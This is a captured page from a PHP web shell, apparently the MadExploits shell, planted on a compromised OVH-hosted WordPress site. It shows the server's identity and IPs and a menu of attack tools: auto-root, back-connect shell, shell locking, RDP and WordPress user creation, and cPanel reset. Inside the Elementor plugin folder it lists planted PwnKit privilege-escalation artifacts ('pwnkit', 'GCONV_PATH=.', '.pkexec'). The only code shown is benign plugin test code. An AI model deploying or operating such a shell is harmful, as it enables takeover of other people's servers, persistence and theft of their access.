Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
plugins /
elementor /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vendor_prefixed
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CONTRIBUTING.md
4.73
KB
-rw-r--r--
changelog.txt
329.45
KB
-rw-r--r--
elementor.php
3.77
KB
-rw-r--r--
eslint-local-rules.js
200
B
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
28.36
KB
-rw-r--r--
run-on-linux.js
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run-on-linux.js
const { spawn, exec } = require( 'child_process' ); const packageJson = require( './package.json' ); function isDockerExist() { return new Promise( ( resolve ) => { exec( 'docker -v', ( error ) => { resolve( ! error ); } ); } ); } async function run( tag ) { const playwrightVersion = packageJson.devDependencies[ '@playwright/test' ]; const workingDir = process.cwd(); const command = 'docker run'; const options = [ '--rm', '--network host', `--volume ${ workingDir }:/work`, '--workdir /work/', '--interactive', process.env.CI ? '' : '--tty', ]; const image = `mcr.microsoft.com/playwright:v${ playwrightVersion.replace( '^', '' ) }-jammy`; const commandToRun = `/bin/bash -c "npm run test:playwright -- --grep="${ tag }""`; spawn( `${ command } ${ options.join( ' ' ) } ${ image } ${ commandToRun }`, { stdio: 'inherit', stderr: 'inherit', shell: true, } ); } ( async () => { if ( ! await isDockerExist() ) { // eslint-disable-next-line no-console console.error( 'Docker is not installed, please install it first.' ); process.exit( 1 ); } await run( process.argv.slice( 2 ) ); } )();
Close